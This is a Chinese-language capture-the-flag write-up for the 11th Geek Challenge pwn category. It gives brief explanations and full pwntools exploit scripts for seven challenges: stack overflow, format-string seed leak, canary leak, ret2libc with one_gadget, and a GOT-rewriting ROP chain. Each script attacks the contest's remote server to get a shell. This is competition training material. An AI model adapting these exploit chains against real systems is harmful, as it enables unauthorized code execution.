第十一届极客大挑战

现在转行还来的及吗？

这里特别感谢C1heck0ut师傅，师傅TQL，不嫌弃我菜，我给师傅拖后腿了。

pwn1:数学咋样？

话不多说,看到提示下载pwntools和ubuntu，直接手撕20个加法

nc 81.69.0.47 1111

得到flag

pwn2:liuzhuang-secret

栈溢出，程序有system(bin_sh)

#! /usr/bin/env python

from pwn import *
#sh=process('./pwn00')
sh=remote('81.69.0.47',1000)

system_addr=0x000000000040079B
payload='a'*0x70+'a'*8+p64(system_addr)
sh.sendline(payload)

sh.interactive()

pwn3:fmt

格式化字符串，首先泄露种子，然后猜对16次getshell

#! /usr/bin/env python
from pwn import *
from ctypes import *

#sh=process('./fmt')
sh=remote('81.69.0.47',2222)
context.log_level='debug'
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
bss_addr=0x40409C

payload='%9$s'+'a'*4+p64(bss_addr)
sh.recvuntil('\n')
sh.sendline(payload)

seed=u64(sh.recv(4).ljust(8,'\x00'))
sh.success('seed : ' +hex(seed))

libc.srand(seed)

for i in range(16):
        sleep(1)
        sh.sendline(str(libc.rand()))

#gdb.attach(sh)
sh.interactive()

pwn4:runcode

写个c就好

#include<stdio.h>
#include<unistd.h>

int main(int arg, char **args)
{
    char *argv[]={"cat","","/home/ctf/flag", NULL};

    char *envp[]={0,NULL}; 
    execve("/bin/cat",argv,envp);
}

pwn5:baby_canary

俩次输入的机会，第一次覆盖canary最后一个字节来泄露canary，第二次栈溢出跳到后门函数。

#! /usr/bin/env python
from pwn import *

#sh=process('./baby_canary')
sh=remote('81.69.0.47',3333)
elf=ELF('./baby_canary')
#context.log_level='debug'

bin_sh=0x00000000004008ED
system_plt=elf.plt['system']
pop_rdi=0x0000000000400873

sh.recvuntil('may be you know it,plz tell me.\n')
payload='a'*0x67+'b'+'a'
sh.send(payload)
sh.recvuntil('b')
canary=u64(sh.recv(8))-0x61
sh.success('canary : ' +hex(canary))

sleep(0.5)
payload='a'*0x68+p64(canary)+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system_plt)
sh.sendline(payload)

sh.interactive()

pwn6:pwn111

ROP利用，简单题

#! /usr/bin/env python
from pwn import *

#sh=process('./pwn111')
sh=remote('81.69.0.47',1122)
elf=ELF('./pwn111')
libc=ELF('./libc')
context.log_level='debug'

pop_rdi=0x0000000000401233
pop_rsi_r15=0x0000000000401231
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x0000000000401146

sh.recvuntil('please input: ')
payload='a'*0x80+'a'*8+p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(write_got)+p64(0)+p64(write_plt)+p64(main_addr)
sh.sendline(payload)

write_addr=u64(sh.recv(6).ljust(8,'\x00'))
sh.success('write_addr : ' +hex(write_addr))
libc_base=write_addr-libc.symbols['write']
sh.success('llibc_base : ' +hex(libc_base))
one_gadget=libc_base+0x4527a
sh.success('one_gadget : ' +hex(one_gadget))

payload='a'*0x80+'a'*8+p64(one_gadget)
sh.sendline(payload)

sh.interactive()

pwn7：pwn222

这里还是参考了riChar师傅的wp才弄懂，太菜了。

具体思路就是通过我们找到的这个gadget，修改read_got为write_got，然后泄露write_got，然后再将write_got修改回read_got，之后再跳回_start函数，最后就是one_gadget一把梭了。

add dword ptr [rbp - 0x3d], ebx ; nop ; ret

#! /usr/bin/env python

from pwn import *

#sh=process('./pwn222')
sh=remote('81.69.0.47',2212)
elf=ELF('./pwn222')
libc=ELF('./libc')
context.log_level='debug'

read_got=elf.got['read']
read_plt=elf.plt['read']
pop_rbx_rbp_r12_r13_r14_r15_ret=0x000000000040122A
pop_rsi_r15_ret=0x0000000000401231
pop_rdi_ret=0x0000000000401233
add_ret=0x000000000040112c

payload='a'*0x28
payload+=p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
payload+=p64(0x60)
payload+=p64(read_got+0x3d)
payload+=p64(0)*4
payload+=p64(add_ret)
payload+=p64(pop_rdi_ret)
payload+=p64(0)
payload+=p64(pop_rsi_r15_ret)
payload+=p64(read_got)
payload+=p64(0)
payload+=p64(read_plt)
payload+=p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
payload+=p64(0xFFFFFFFFFFFFFFA0)
payload+=p64(read_got+0x3d)
payload+=p64(0)*4
payload+=p64(add_ret)
payload+=p64(0x0000000000401060)
sh.sendline(payload)

write_addr=u64(sh.recv(8))
sh.success('write_addr : ' +hex(write_addr))
libc_base=write_addr-libc.symbols['write']
one_gadget=libc_base+0x4527a

payload2='a'*0x28+p64(one_gadget)
sh.sendline(payload2)
sh.interactive()